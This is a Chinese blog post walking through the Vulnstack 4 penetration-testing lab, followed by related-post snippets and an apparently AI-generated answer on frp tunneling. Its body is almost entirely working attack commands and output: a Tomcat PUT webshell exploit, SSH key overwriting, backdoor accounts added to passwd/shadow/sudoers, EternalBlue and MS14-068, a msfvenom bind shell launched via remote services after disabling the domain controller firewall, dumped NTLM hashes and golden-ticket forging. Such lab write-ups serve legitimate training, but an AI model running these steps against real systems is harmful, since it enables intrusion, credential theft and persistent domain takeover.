Vulnstack(四)

最新推荐文章于 2024-12-07 11:26:39 发布
最新推荐文章于 2024-12-07 11:26:39 发布
阅读量1.1k 收藏 3
点赞数 2
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42094992/article/details/117168008
版权
本文详细介绍了渗透测试的过程,包括信息收集(主机发现、端口扫描),Apache put文件上传漏洞利用,SSH密钥窃取,创建新用户,内网横向移动(主机探测、Chisel socks连接、MSF永恒之蓝利用),以及权限维持(域控信息收集、权限提升)。展示了多种工具和技术在实战中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶场拓扑

下载连接:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

用的是VMware workstation  所以可能出现一些错误

Docker环境启动的是Vulhub的在线三个靶机

1.信息收集

主机发现

sudo netdiscover -i eth1 -r 192.168.157.0/24

端口扫描

nmap -A 192.168.53.128 -p- -oN nmap.a

2.apache put文件上传脚本利用

使用kali自带的脚本上传webshell

searchsploit apache
cd /usr/share/exploitdb/exploits/jsp/webapps/
cp 42966.py ~/Desktop/


使用方法
options:

-u ,--url [::] check target url if it's vulnerable 
-p,--pwn  [::] generate webshell and upload it
-l,--list [::] hosts list

[+]usage:

./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt

python ./42966.py -u http://192.168.157.128:2002/ -p pwn

上传webshell

3.SSH密钥窃取

生成SSH密钥

cd ~/.ssh
ssh-kengen -t rsa

编写批处理bash脚本上传至服务器覆盖密钥对

cp -avx /test/home/ubuntu/.ssh/id_rsa.pub /test/home/ubuntu/.ssh/authorized_keys
echo > /test/home/ubuntu/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCariHvGdUFNGfHtFSmW7Q2woLBhYEA6j6tfzW2LpkOyP/hf+jlUaaJGdS7h5/O6qVrSQy0p5R8TlzwGlumAhaSJmi5TSt6+sNNMVaWtzukKh1BfUfQYVwfneefpz7830nGv9B5MWpYgwNh287jGXwcCqb17Ia6151ntEKJIEf70pQ+rIq+id8p2I9lv0g4qyp6JbTAmNUXm4Pt1PwSnTE4m6wX4g7hqOo7xhyDbrfstIghGW9YQuDR6PCDtnMKmD4hwYHJ/Bsthu22E0Do3mn2nnqhjpCxsdHwpr4dY54wVCz4XCHTac8etSyrHHb/TaXBR/HexlwgJ4/7E9A0I9mEKxluix6Gp6ZUnHEaT9BIg8LcOB6K7PtJR7v0iPzNTtNURXv2yZWr/gtBVyhinZKwerXIGEbmgKzbEZ7boEOhcXmjcAmHgJUosSNNG/NkJTdhPeGdvfpda3pHurt454uUikUzM1DqPiI7j+eq0osxv55s8wJFxOLo4ofzhPdr4WU= kali@ToolsScannerKali20201' > /test/home/ubuntu/.ssh/authorized_keys
cat /test/home/ubuntu/.ssh/authorized_keys

使用Python开启一个HTTP服务

python -m SimpleHTTPServer

Webshell使用wget命令下载bash脚本

chmod 777 kk.sh
./kk.sh

SSH密钥连接服务器

4.覆盖配置文件创建用户

编写bash脚本上传至webshell处  使用root权限进行创建用户

chmod +w /test/etc/passwd
chmod +w /test/etc/shadow
chmod +w /test/etc/sudoers
mkdir /test/home/wxk
chmod 777 /test/home/wxk
echo 'wxk:x:1001:1000:wxk,,,:/home/wxk:/bin/bash' >> /test/etc/passwd
echo 'wxk:$6$y7ditcTck7bT1Hnm$zIW.1CQlRsI3HfvX0Wsp855YOXftM2YEkRZ28Ycr9CpYcWOXUN00ef2jzsipWlhaFjZoqB7jjaceC4l9cE9He0:18769:0:99999:7:::' >> /test/etc/shadow
echo 'wxk    ALL=(ALL:ALL) ALL' >> /test/etc/sudoers
cat /test/etc/shadow

SSH连接创建的用户

ssh wxk@192.168.157.128
sudo -s   #sudolers 配置文件赋权

5.内网横向

内网主机探测

写个脚本进行内网主机探测

#!/bin/bash
NETWORK=$1
for HOST in $(seq 1 254)
do
        ping -c 1 -w 1 $NETWORK.$HOST &>/dev/null && result=0 || result=1
                if [ "$result" == 0 ];then
                        echo -e "\033[32;1m$NETWORK.$HOST is up! \033[0m"
                fi
done

 

chisel建立socks连接

chisel下载地址:https://github.com/jpillora/chisel/releases

./chisel server -p 4545 --socks5
./chisel client 192.168.157.128:4545 socks

MSF永恒之蓝正向连接

use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.133
rhost => 192.168.183.133
msf5 exploit(windows/smb/ms17_010_eternalblue) > setg Proxies socks5:127.0.0.1:1080
Proxies => socks5:127.0.0.1:1080
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

域内信息收集

net view /DOMAIN            #查询域名
            DEMO
net view /DOMAIN:DEMO  #查询域内主机
            \\TESTWIN7-PC                                                                  
            \\WIN-ENS2VR5TR3N
steal_token 2860  加入到douser进程 #提权为域用户
net group "domain controllers" /domain   #查询域控
                                                   WIN-ENS2VR5TR3N$
wmic computersystem get domain      #查看完整域名
                                                                demo.com
net group "doamin admins" /domain   #查询域管理员
                                                                Administrator
net group "domain users" /domain       #查询域内有哪些用户
                                                                Administrator            douser                   krbtgt
nslookup WIN-ENS2VR5TR3N.demo.com    #查询域控IP
                                                                          Name:    WIN-ENS2VR5TR3N.demo.com
                                                                          Address:  192.168.183.130
whoami /all   #SID
                      user:S-1-5-21-979886063-1111900045-1414766810-1107
                      domain:S-1-5-21-979886063-1111900045-1414766810
systeminfo #补丁信息
                           Hotfix(s):                 37 Hotfix(s) Installed.
                           [01]: KB2491683
                           [02]: KB2534111
                           [03]: KB2564958
                           [04]: KB2621440
                           [05]: KB2653956
                           [06]: KB2654428
                           [07]: KB2698365
                           [08]: KB2705219
                           [09]: KB2736422
                           [10]: KB2813430
                           [11]: KB2900986
                           [12]: KB2937610
                           [13]: KB2943357
                           [14]: KB2978120
                           [15]: KB2984972
                           [16]: KB2992611
                           [17]: KB2999226
                           [18]: KB3004375
                           [19]: KB3010788
                           [20]: KB3023215
                           [21]: KB3031432
                           [22]: KB3035126
                           [23]: KB3037574
                           [24]: KB3045685
                           [25]: KB3046269
                           [26]: KB3072305
                           [27]: KB3074543
                           [28]: KB3086255
                           [29]: KB3097989
                           [30]: KB3101722
                           [31]: KB3108371
                           [32]: KB3122648
                           [33]: KB3127220
                           [34]: KB3155178
                           [35]: KB4019990
                           [36]: KB4040980
                           [37]: KB976902

MS14-068提权

MS14-068.exe -u douser@demo.com -p Dotest123 -sS-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

载入票据

mimikatz # kerberos::ptc TGT_douser@demo.com.ccache

MSF正向连接域控

生成正向shell脚本

msfvenom -p windows/meterpreter/bind_tcp lport=1234 -f exe > upd.exe

添加服务关闭域控防火墙
sc \\WIN-ENS2VR5TR3N create closewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start closewall                              #启动服务

sc \\WIN-ENS2VR5TR3N create ProtectUpdate binpath="C:\upd.exe"    #创建服务执行文件
sc \\WIN-ENS2VR5TR3N start ProtectUpdate                          #启动服务

定时执行文件
copy upd.exe \\WIN-ENS2VR5TR3N\c$\upd.exe

net time \\WIN-ENS2VR5TR3N

at \\WIN-ENS2VR5TR3N 9:06:00 c:/upd.exe

定时执行文件

steal_token 进程提权为域管理员

6.权限维持

使用域管理员账户读取krbtgt的NTLM Hash

读取域控hash明文密码

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c63e855aa6906d5e10725c3ed5e3a9ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

抓取域内所有hash

[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942
[+]     krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c4ed692473d4b4344c3ba01c5e6cb63
[+]     douser:1103:aad3b435b51404eeaad3b435b51404ee:bc23b0b4d5bf5ff42bc61fb62e13886e
[+]     WIN-ENS2VR5TR3N$:1000:aad3b435b51404eeaad3b435b51404ee:825b4d415a87a34cccee85260858055e

抓取登陆后明文密码

获取krbtgt账户SID

wmic useraccount where name="krbtgt" get sid

S-1-5-21-979886063-1111900045-1414766810-502

kiwi读取krbtgte的信息

[+] Account   : krbtgt
[+] NTLM Hash : 7c4ed692473d4b4344c3ba01c5e6cb63
[+] LM Hash   : 4d81a5d6b591f0710e75884e5ef9cba2
[+] SID       : S-1-5-21-979886063-1111900045-1414766810-502
[+] RID       : 502

生成黄金票据

golden_ticket_create -d <域名> -u <任意用户名> -s <Domain SID> -k <krbtgt NTLM Hash> -t <ticket 本地存储路径如:/tmp/krbtgt.ticket>
golden_ticket_create -d demo.com -u wxk -s S-1-5-21-979886063-1111900045-1414766810 -k 7c4ed692473d4b4344c3ba01c5e6cb63 -t /tmp/krbtgt.ticket

清除票据

kerberos_ticket_purge

载入票据

kerberos_ticket_use /tmp/krbtgt.ticket

 

 

vulnstack域环境靶场(
BROTHERYY的博客
12-09 1545
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
靶场vulnstack4的搭建
weixin_71169068的博客
11-17 841
搭建靶场vulnstack4
靶场复现系列--vulnstack 4
梦之旅行地
12-17 1873
一、前言 也不知道是我运气差还是怎么回事,用vmw搭靶场就是搭不起来,遇到各种问题,后来换成virtual box后解决几个问题就可以了。 第一个问题,虚拟机导入后网卡最好重新配下,不然容易报网卡的错误 第二个问题,启动docker报错,web服务器(ubuntu)用户未加入docker组,将ubuntu用户加入docker组后,重启就可以通过docker构建容器了,下面是加入docker组的命令 sudo gpasswd -a ${USER} docker 二、实践 1.拓扑 备注:这图片直接在靶场
[渗透测试]Vulnstack 红队(
cosmoslin的博客
04-03 597
环境配置 网络拓扑图(仅供参考) 账号信息: web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 ip信息: 攻击机 IP:192.168.111.5 OS:Kali 靶机 Web IP1:192.168.111.14 IP2:192.168.52.129 OS:Ubuntu DC IP:192.168.183.0/24 OS:Windows Server 2008 PC
vulstack红队评估()
PANDA墨森的博客
06-21 1769
原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118210.html 一、环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu win7: douser:Dotest123 Win2008 DC: administrator:Test2008,因为登陆要修改密码,所以改为了panda666... ②虚拟机网卡设置 ubuntu双网卡模拟内外网: 外网:192.168.1....
vulnstack4
m0_70782241的博客
02-23 1343
docker逃逸,域渗透
vulnstack1--红队靶机(域渗透)
tlovejr的博客
04-27 4271
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 二、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第二次开机时,原
vulnstack-ATT&CK实战系列 红队实战()
qq_41755084的博客
02-21 563
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019漏洞详情 (qiyuanxuetang.net)
ATT&CK实战系列-红队实战()vulnstack 红日靶场一
weixin_68652890的博客
05-20 1919
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
vulnstack4渗透-外网篇
weixin_51441054的博客
04-20 3199
环境搭建 靶机:ubuntu:ubuntu(web服务器 网卡1:192.168.142.139(模拟外网) 网卡2:192.168.183.130(内网)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外网) 先对web靶机进行信息收集 发现一个ssh服...
红日安全ATT&CK靶机实战系列之vulnstack4
热门推荐
黑白的博客
04-25 1万+
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
Vulnstack内网靶场4
weixin_48888525的博客
11-07 2766
环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器  攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd
vulnstack红日-4
paidx0
07-11 404
vulnstack红日-4
红日靶机vulnstack04【半总结】
qq_45300786的博客
10-06 634
这次环境是3台机器, web服务器:000000 、DC:000000ydc. 、 win7 web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。 所以我就进入高级模式下,修改了root用户的密码 关于虚拟机没有ipIP解决方案 然后再切到root用户修改ip win7 这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码 这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个sy
红日靶场vulnstack 4靶机的测试报告[细节](二)
ccc_9wy的博客
12-07 1364
基于渗透测试流程渗透vulnstack 4靶场;红日靶场;内网渗透;mimikatz;msfconsole;ms 14-68;ms17-010;永恒之蓝;域内信息搜集;Windows渗透;域渗透;Kerberos
渗透靶场--vulnstack-红队评估实战(4)
weixin_45794666的博客
07-20 825
vulnstack-红队评估实战(4) 环境配置 web服务器 ubuntu:ubuntu 内网192.168.183.131 外网192.168.154.137 web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613 sudo su ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045 docker-compose up 域成员机器 douser:Dotest123 192.168.183.128 域控
【红日靶场】vulnstack4-完整渗透过程
信安是不可或缺的一部分!
10-19 1567
提示:以下是本篇文章正文内容,下面案例可供参考。
靶场vulnstack4内网渗透
weixin_71169068的博客
11-18 1101
靶场vulnstack4内网渗透
红日安全vulnstack-ATT&CK实战系列 红队实战()
遇事不决冲冲冲
03-29 8956
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 二.环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
⼯作原理: Frp由客户端和服务器端组成。客户端部署在内⽹服务器上,服务器端部署在公⽹服务器上。客户 端和服务器端之间通过指定的端⼝建⽴连接。客户端将内⽹服务的流量通过加密的⽅式发送到服务器 端,服务器端解密后将流量转发到公⽹上,实现内⽹服务的映射到公⽹。 一台kail,一台Vulnstack-Win7-x64-PhpMyAdmin,一台Windows server 2008,通过之前的原理,来实现kail访问Windows server 2008的web服务器连同Vulnstack-Win7作为中间跳板用socks5,kail和Vulnstack-Win7-x64-PhpMyAdmin都要安装配置frp,kail 192.168.42.149Vulnstack-Win7192.168.42.100和192.168.52.100Windows Server 2008192.168.52.138,kail作为服务端,Windows server 2008作为web服务器,Vulnstack-Win7作为连接
最新发布
03-30
<think>嗯,用户的问题是关于如何利用Frp来实现内网穿透,让Kali能够通过作为中间跳板的Vulnstack-Win7访问到Windows Server 2008的Web服务。我需要先理清楚各个设备的网络配置和角色分配。 首先,根据用户提供的IP地址,Kali(192.168.42.149)和Vulnstack-Win7(192.168.42.100)在同一个子网42中,而Vulnstack-Win7还有一个IP是52网段的(192.168.52.100),这说明它可能连接了两个不同的网络。Windows Server 2008的IP是192.168.52.138,和Vulnstack-Win7的52网段在同一子网,所以Vulnstack-Win7可以作为跳板,连接42和52这两个网段。 用户希望Kali作为Frp的服务端,Vulnstack-Win7作为客户端,同时还要配置Socks5代理。需要确认Frp的服务端应该部署在哪个位置。通常,服务端需要具有公网IP,但在这个案例中,可能是在内网环境中,所以Kali作为服务端,监听来自Vulnstack-Win7客户端的连接。然后通过Frp将Windows Server 2008的Web服务暴露出来,同时设置Socks5代理进行流量转发。 接下来,我需要考虑Frp的配置步骤。服务端(Kali)需要配置frps.ini,设置绑定端口,比如7000,可能还需要配置dashboard端口。客户端(Vulnstack-Win7)则需要配置frpc.ini,连接到Kali的7000端口,并设置Web服务的转发,比如将本地52网段的80端口映射到服务端的某个端口,如8080。同时,还需要配置Socks5代理,让Kali能够通过这个代理访问到52网段的其他服务。 另外需要注意防火墙设置,确保相关端口在Kali和Vulnstack-Win7上都是开放的。比如,Kali需要开放7000、7500和代理端口如1080,而Vulnstack-Win7需要允许Frp客户端出站连接到Kali的7000端口。Windows Server 2008的防火墙也要确保80端口开放,允许来自Vulnstack-Win7的访问。 可能用户在实际操作中会遇到的问题包括配置错误、端口冲突、防火墙阻止连接等。需要提醒用户检查配置文件是否正确,服务是否正常运行,以及网络连通性是否正常。例如,测试从Vulnstack-Win7能否访问Windows Server 2008的Web服务,以及从Kali能否通过Socks5代理访问52网段的其他资源。 最后,要确保步骤清晰,用户能够逐步跟随配置,并且理解每个步骤的作用。比如,Frp服务端和客户端的配置文件的每个参数的含义,以及如何验证每个部分是否工作正常。同时,安全方面,使用加密和身份认证(token)来保证Frp连接的安全性,避免未授权访问。</think>根据Frp的⼯作原理和你的需求,我将分步骤说明如何搭建这个穿透环境: 一、网络拓扑分析 $$ \begin{array}{ccc} \text{Kali(服务端)} & \leftrightarrow & \text{Vulnstack-Win7(客户端)} \\ 192.168.42.149 & \text{子网42} & 192.168.42.100 \\ & & \downarrow \text{子网52} \\ & & \text{Win2008(Web服务)} \\ & & 192.168.52.138 \\ \end{array} $$ 二、配置步骤 1. Kali服务端配置(frps) ```ini # frps.ini [common] bind_port = 7000 # 客户端连接端口 dashboard_port = 7500 # 监控面板 dashboard_user = admin dashboard_pwd = your_password token = your_token # 身份验证密钥 ``` 2. Vulnstack-Win7客户端配置(frpc) ```ini # frpc.ini [common] server_addr = 192.168.42.149 server_port = 7000 token = your_token # Web服务穿透 [web] type = tcp local_ip = 192.168.52.138 # 目标服务器IP local_port = 80 # 目标服务端口 remote_port = 8080 # 外网暴露端口 # Socks5代理 [socks5] type = tcp plugin = socks5 remote_port = 1080 ``` 3. Windows Server 2008配置 - 确保IIS/Apache等Web服务正常运行 - 开放80端口防火墙策略 三、验证流程 1. 启动服务 ```bash # Kali启动服务端 ./frps -c frps.ini # Win7启动客户端 frpc.exe -c frpc.ini ``` 2. 测试访问 - 通过Kali访问Web服务: ```bash curl http://192.168.42.149:8080 ``` 3. 使用Socks5代理 ```bash # 配置proxychains echo "socks5 192.168.42.149 1080" >> /etc/proxychains.conf # 通过代理访问内网 proxychains curl 192.168.52.138 ``` 、注意事项 1. 防火墙策略需开放: - Kali:7000(frp连接)、7500(面板)、1080(socks5) - Win7:允许frpc出站连接 - Win2008:允许80端口入站 2. 隧道加密建议: - 在[common]中添加: ```ini tls_enable = true # 启用TLS加密 authenticate_new_work_conn = true ``` 3. 流量监控: 可通过`tcpdump -i eth0 port 7000`监控基础通信流量 实际配置时需要根据具体服务类型(HTTP/TCP/UDP)调整穿透参数,建议先完成基础穿透后再添加Socks5代理功能。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值